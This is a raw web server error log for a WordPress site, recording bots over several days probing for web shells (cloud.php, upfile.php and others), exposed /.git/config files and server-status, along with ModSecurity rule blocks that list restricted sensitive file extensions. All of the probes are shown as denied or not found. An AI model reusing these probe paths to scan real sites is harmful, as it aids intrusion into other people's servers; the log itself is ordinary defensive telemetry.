[client 129.213.94.27:38804] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Jan 13 09:57:07.744111 2025] [autoindex:error] [pid 14991:tid 140403328141056] [client 129.213.94.27:38808] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Jan 13 09:57:08.440063 2025] [autoindex:error] [pid 14398:tid 140403311355648] [client 129.213.94.27:38812] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Jan 13 09:57:13.317420 2025] [:error] [pid 14397:tid 140403260999424] [client 129.213.94.27:38826] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Jan 13 09:57:13.337284 2025] [:error] [pid 14397:tid 140403286177536] [client 129.213.94.27:38828] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Jan 13 09:57:58.889416 2025] [:error] [pid 14398:tid 140403269392128] [client 129.213.94.27:38956] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Jan 13 09:58:12.522203 2025] [:error] [pid 14398:tid 140403244214016] [client 129.213.94.27:38988] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Jan 13 09:58:12.531703 2025] [:error] [pid 14991:tid 140403294570240] [client 129.213.94.27:38990] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Jan 13 09:58:49.651416 2025] [autoindex:error] [pid 14397:tid 140403219035904] [client 129.213.94.27:39090] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Jan 13 09:59:00.941405 2025] [:error] [pid 14397:tid 140403202250496] [client 129.213.94.27:39120] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Jan 13 09:59:01.966836 2025] [autoindex:error] [pid 14397:tid 140403260999424] [client 129.213.94.27:39124] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Jan 13 09:59:03.105850 2025] [autoindex:error] [pid 14399:tid 140403302962944] [client 129.213.94.27:39128] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Jan 13 09:59:09.732478 2025] [:error] [pid 14397:tid 140403328141056] [client 129.213.94.27:39142] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Jan 13 09:59:09.761290 2025] [:error] [pid 14399:tid 140403319748352] [client 129.213.94.27:39144] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php 2025/01/13 12:17:23 [error] 14264#14264: *374239 access forbidden by rule, client: 13.40.211.208, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Jan 13 16:57:10.089368 2025] [:error] [pid 14398:tid 140403328141056] [client 81.19.208.108:47066] [client 81.19.208.108] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "Z4WMNrlwdJmRORjKe_Q7IwAAAEU"] [Tue Jan 14 00:42:42.720415 2025] [:error] [pid 14991:tid 140403430635264] [client 81.19.208.108:52930] [client 81.19.208.108] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "Z4X5Up_qyveTvvSer_pPLQAAAME"] [Tue Jan 14 02:32:55.961545 2025] [authz_core:error] [pid 14399:tid 140403227428608] [client 134.122.28.88:54770] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/14 02:32:58 [error] 14263#14263: *381991 access forbidden by rule, client: 134.122.28.88, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Jan 14 03:33:47.326814 2025] [ssl:warn] [pid 16696:tid 140466031585152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 14 03:33:47.608964 2025] [ssl:warn] [pid 16697:tid 140466031585152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 14 03:33:48.059579 2025] [ssl:warn] [pid 16697:tid 140466031585152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 14 03:33:50.770266 2025] [ssl:warn] [pid 16697:tid 140466031585152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 14 03:33:53.099389 2025] [ssl:warn] [pid 17114:tid 140718848354176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 14 03:33:53.333288 2025] [ssl:warn] [pid 17115:tid 140718848354176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 14 04:18:31.171325 2025] [authz_core:error] [pid 17679:tid 140718538475264] [client 165.227.173.41:56180] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/14 04:18:35 [error] 17012#17012: *382691 access forbidden by rule, client: 165.227.173.41, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/14 04:25:32 [error] 17011#17011: *382738 access forbidden by rule, client: 13.40.211.208, server: investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Jan 14 20:55:18.417143 2025] [autoindex:error] [pid 17679:tid 140718454548224] [client 193.36.225.105:45954] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Tue Jan 14 20:55:23.170044 2025] [autoindex:error] [pid 17679:tid 140718471333632] [client 193.36.225.105:45966] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Tue Jan 14 20:55:32.861066 2025] [autoindex:error] [pid 17134:tid 140718395799296] [client 193.36.225.105:45988] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Tue Jan 14 20:55:37.613123 2025] [autoindex:error] [pid 17133:tid 140718538475264] [client 193.36.225.105:46002] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jan 14 20:55:38.746666 2025] [autoindex:error] [pid 17679:tid 140718640428800] [client 193.36.225.105:46006] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Tue Jan 14 20:55:50.160297 2025] [autoindex:error] [pid 17679:tid 140718404192000] [client 193.36.225.105:46034] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Tue Jan 14 20:55:50.399760 2025] [:error] [pid 17679:tid 140718429370112] [client 193.36.225.105:46036] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Tue Jan 14 20:55:53.100178 2025] [autoindex:error] [pid 17679:tid 140718657214208] [client 193.36.225.105:46046] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Tue Jan 14 20:55:55.114862 2025] [autoindex:error] [pid 17679:tid 140718538475264] [client 193.36.225.105:46052] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Tue Jan 14 20:56:07.933851 2025] [autoindex:error] [pid 17133:tid 140718513297152] [client 193.36.225.105:46080] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Tue Jan 14 20:56:13.965692 2025] [autoindex:error] [pid 17132:tid 140718530082560] [client 193.36.225.105:46096] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Tue Jan 14 20:56:16.952048 2025] [autoindex:error] [pid 17679:tid 140718395799296] [client 193.36.225.105:46104] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Tue Jan 14 20:56:21.159127 2025] [autoindex:error] [pid 17134:tid 140718395799296] [client 193.36.225.105:46114] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Tue Jan 14 20:56:22.371032 2025] [autoindex:error] [pid 17132:tid 140718420977408] [client 193.36.225.105:46120] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Tue Jan 14 20:56:24.646341 2025] [:error] [pid 17134:tid 140718546867968] [client 193.36.225.105:46126] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Jan 14 20:56:27.754948 2025] [autoindex:error] [pid 17132:tid 140718404192000] [client 193.36.225.105:46136] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Tue Jan 14 20:56:32.723953 2025] [autoindex:error] [pid 17132:tid 140718412584704] [client 193.36.225.105:46148] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Tue Jan 14 20:56:43.267085 2025] [autoindex:error] [pid 17132:tid 140718454548224] [client 193.36.225.105:46174] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jan 14 20:56:51.992931 2025] [autoindex:error] [pid 17134:tid 140718640428800] [client 193.36.225.105:46194] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Tue Jan 14 20:57:05.580621 2025] [:error] [pid 17134:tid 140718454548224] [client 193.36.225.105:46228] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Jan 14 20:57:06.674374 2025] [autoindex:error] [pid 17134:tid 140718412584704] [client 193.36.225.105:46232] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Tue Jan 14 20:57:21.364869 2025] [:error] [pid 17134:tid 140718395799296] [client 193.36.225.105:46262] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Jan 14 20:57:36.398973 2025] [:error] [pid 17679:tid 140718454548224] [client 193.36.225.105:46294] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Tue Jan 14 20:57:49.405640 2025] [autoindex:error] [pid 17132:tid 140718538475264] [client 193.36.225.105:46326] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Tue Jan 14 20:58:27.745657 2025] [:error] [pid 17679:tid 140718648821504] [client 193.36.225.105:46406] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Jan 15 03:44:40.969801 2025] [ssl:warn] [pid 1287:tid 140193559865216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 15 03:44:41.152608 2025] [ssl:warn] [pid 1289:tid 140193559865216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 15 03:44:41.482259 2025] [ssl:warn] [pid 1289:tid 140193559865216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 15 03:44:43.201719 2025] [ssl:warn] [pid 1289:tid 140193559865216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 15 03:44:45.461572 2025] [ssl:warn] [pid 1724:tid 140363064936320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 15 03:44:45.613934 2025] [ssl:warn] [pid 1725:tid 140363064936320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 15 07:33:43.450656 2025] [:error] [pid 1744:tid 140362865403648] [client 178.239.173.44:55318] [client 178.239.173.44] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "Z4erJxXoUsQUmO2ao-zWgwAAAII"] 2025/01/15 15:43:36 [error] 1705#1705: *403383 access forbidden by rule, client: 35.77.33.14, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/15 17:32:05 [error] 1706#1706: *404449 access forbidden by rule, client: 35.77.33.14, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/01/15 17:37:12 [error] 1706#1706: *404474 access forbidden by rule, client: 103.102.230.8, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/01/15 17:44:58 [error] 1705#1705: *404517 access forbidden by rule, client: 35.77.33.14, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/15 18:07:29 [error] 1706#1706: *404675 access forbidden by rule, client: 103.102.230.8, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/15 18:28:38 [error] 1705#1705: *404877 access forbidden by rule, client: 103.102.230.8, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/15 20:51:00 [error] 1706#1706: *405665 access forbidden by rule, client: 185.196.220.16, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Thu Jan 16 03:40:47.516891 2025] [ssl:warn] [pid 13254:tid 140472914503552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 16 03:40:47.827168 2025] [ssl:warn] [pid 13255:tid 140472914503552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 16 03:40:48.276496 2025] [ssl:warn] [pid 13255:tid 140472914503552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 16 03:40:50.187714 2025] [ssl:warn] [pid 13255:tid 140472914503552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 16 03:40:52.454536 2025] [ssl:warn] [pid 13676:tid 140418402862976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 16 03:40:52.631632 2025] [ssl:warn] [pid 13677:tid 140418402862976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 16 05:49:22.886858 2025] [authz_core:error] [pid 14492:tid 140418220115712] [client 164.90.208.56:50364] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/16 05:49:27 [error] 13658#13658: *409974 access forbidden by rule, client: 164.90.208.56, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Jan 16 07:15:17.720224 2025] [authz_core:error] [pid 13696:tid 140418092091136] [client 159.89.12.166:51296] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/16 07:15:22 [error] 13658#13658: *410570 access forbidden by rule, client: 159.89.12.166, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Jan 17 01:13:46.994045 2025] [autoindex:error] [pid 14492:tid 140418194937600] [client 13.71.23.36:43924] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jan 17 03:16:48.359193 2025] [ssl:warn] [pid 25423:tid 140352343619456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 17 03:16:48.560168 2025] [ssl:warn] [pid 25424:tid 140352343619456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 17 03:16:49.038755 2025] [ssl:warn] [pid 25424:tid 140352343619456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 17 03:16:51.716919 2025] [ssl:warn] [pid 25424:tid 140352343619456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 17 03:16:54.061323 2025] [ssl:warn] [pid 25842:tid 139903037519744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 17 03:16:54.246632 2025] [ssl:warn] [pid 25843:tid 139903037519744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 17 04:29:56.628931 2025] [:error] [pid 25862:tid 139902620481280] [client 178.239.173.44:45888] [client 178.239.173.44] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "Z4ojFF8zhWI3RQwH0RZUmwAAAJM"] [Fri Jan 17 14:49:01.818231 2025] [:error] [pid 26413:tid 139902829594368] [client 178.239.173.44:58528] [client 178.239.173.44] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag 